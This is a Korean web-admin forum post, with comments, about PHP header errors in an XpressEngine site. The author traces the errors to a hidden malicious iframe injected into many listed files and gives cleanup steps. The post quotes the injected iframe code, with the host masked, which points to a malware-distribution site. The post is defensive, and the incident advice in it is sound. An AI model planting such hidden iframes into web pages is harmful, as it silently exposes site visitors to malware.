웹마스터 팁
홈페이지 헤더부분에 display.handler.class.php 오류발생시 급해결방법
2009.08.09 18:56
다음은 오류내용입니다~
-----------------------------------------------------------------------------------------------------------------------------------------------
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 138
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 389
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 390
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 391
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 392
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 393
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 394
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 148
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 148
-------------------------------------------------------------------------------------------------------------------------------------------
위 오류가 홈페이지와 관리자접속(admin)시 헤더에 나타난다면
뭔지는 모르지만 다음파일에 악성코드가 입력되있습니다.
(어제 올라온 질답글에 xe님이 올려주신 내용중 발췌했습니다)
www/xe/index.php
www/xe/modules/homepage/homepage.class.php
www/xe/modules/homepage/homepage.smartphone.php
www/xe/modules/homepage/homepage.admin.view.php
www/xe/modules/homepage/homepage.controller.php
www/xe/modules/homepage/homepage.model.php
www/xe/modules/homepage/homepage.view.php
www/xe/modules/admin/tpl/index.html
www/xe/modules/rss/tpl/index.html
www/xe/modules/session/tpl/index.html
www/xe/modules/communication/tpl/index.html
www/xe/modules/spamfilter/tpl/index.html
www/xe/files/cache/module_info/homepage.ko.php
www/xe/common/tpl/default_layout.html
보니 악성코드의 내용은 아이프레임(iframe)이였으며 내용은 맨밑에
<iframe src="./http://????????.com/index.php" width=200 height=141 style="visibility: hidden"></iframe>
이러한 코드가 삽입되있는것을 볼수있습니다.
일단 이것을 고치는 방법은 저 파일을 원본파일로 덮어쓰기하여 수정하는 부분입니다.
파일은 첨부하겠습니다^^;(물론 파일을 하나하나 찾아서 업뎃하시는것도 괜찮지만 전 귀찮아서;;만들었습니다 또당할까봐-_-;)
또한 저 위 파일말고도 뭔가 더 수정됬을수도 있을꺼같은데 뭐 그건 함 더 걸리면 통체로 다운받고 index나 익스플로러에
뿌려지는 파일을 하나하나 찾아보려고 합니다--;;
뭐 아무튼 아무쪼록 저런 display오류가 나타난다면
메인 index.php파일을 확인해보시고 맨아래 저런 코드가 삽입되어있다면
가차없이
덮어씌우기 바라겠습니다--;;
근데 어떻게 저기에 저렇게 코드가 들어갔을까요;;;
댓글 3
-
jjabez
2009.08.10 15:48
-
:맥노턴
2009.09.10 15:29
별도의 포렌직 도구를 개발하지 않으셨다면, find 의 -mtime 옵션으로 특정 기간동안 수정된 파일을 자근자근 검색해서 변경된 파일을 뽑아내서 작업하시면 백도어를 찾는데 도움이 되실겁니다.
물론, 로그 분석(운좋으면), 암호변경 잊으시면 안되고, find / 해서 전체를 검색하셔야 하고,
서버에 설치된 모든 패키지들의 버전정보를 뽑아서 보안 리포트와 대조하시고,
심각한 녀석부터 업그레이드 하시고, 불필요한 패키지는 과감히 지우시고, 보안정책 수정하고... ㅡㅡ;
ㅎㅎㅎ; 고생하셔요... 새로 싹 밀어버리더라도 원인을 파악하지 못하면 또다시 들어옵니다... ^^; 원인을 찾아내시길...
XE문제일 수도 있으므로 유심히 구석구석 살펴보세요...
-
쥬시쿨
2010.04.28 02:10
저런 파일의 권한을 변경하는건 안되나요 ???
제목 | 글쓴이 | 날짜 |
---|---|---|
페이지 로딩중 효과 [7] | 깜보 | 2003.02.16 |
한페이지에서 여러개의 크롬리스 창 띄우기..(ByKlein Chromeless Window) [3] | 아린~★ | 2003.01.29 |
[1분짜리 팁!] 홈페이지 입장 여부 묻는 폼 띄우기! [2] | 찐군 | 2003.01.09 |
홈페이지 패스워드(암호) 걸기 소스 [6] | keymove | 2003.01.09 |
홈페이지에 머무른 시간을 알림창으로 나타내기. [3] | 시즌오브드림 | 2002.12.10 |
단축키로 페이지이동 [17] | 아벨라 | 2002.10.18 |
페이지 맨위로 이동하는 top 버튼 [7] | 조정환 | 2002.09.28 |
간단하고 빠른 페이지포워딩 [3] | Draco | 2002.09.19 |
브라우저 언어에 따라 다른 페이지 보이기 [11] | 써니얌 | 2002.09.03 |
접속하자 마자 풀스크린으로 바뀌는 홈페이지만들기 [20] | 노명수 | 2002.09.02 |
원하는 홈페이지를 시작페이지 설정하기!!!! [3] | 오길호 | 2002.07.05 |
[v]하나더! 해상도별 다른 페이지 보여주기 | :+:zZion:+: | 2002.03.30 |
[v]운영 체제별 다른 페이지 보여주기 -_-;v [3] | ┏ⓩZion┛ | 2002.03.30 |
홈페이지 패스워드 걸기 소스 [7] | 이슈™ | 2002.03.13 |
페이지 사용안하고 팝업띄우기 [4] | 란즈 | 2002.03.02 |
▩찾기 기능을 내 홈페이지에 넣어보자 [1] | ▩윤미 | 2002.02.26 |
[JavaScript] 전체화면으로 페이지 열기 [2] | SM | 2002.02.24 |
[JavaScript] 랜덤 듀레이션 효과 - 페이지 들어오고 나갈때 벗겨지는 효과 보여주기 [1] | SM | 2002.02.24 |
페이지마다 타이틀 변경하기 [3] | WOWpc | 2001.10.10 |
[Tip] 페이지 이동중이라고 표시해보자~ ^_^ [10] | BiHon | 2001.03.28 |
FTP 아이디/비밀번호 유출되면 저 악성코드가 심어집니다.
그리고 위에 아이프레임 주소는 바이러스 유포사이트로 리다이렉트되는 주소입니다.
때문에 이 곳 게시판에 명시하실 때는 실제 주소를 써 놓으시면 안됩니다.
http를 hxxp로 명기하시던가 링크사이트에 접속하지 말도록 공지하시는 것이 좋겠습니다.
다행히 현재는 유포사이트 호스트가 폐쇄중라고 하네요.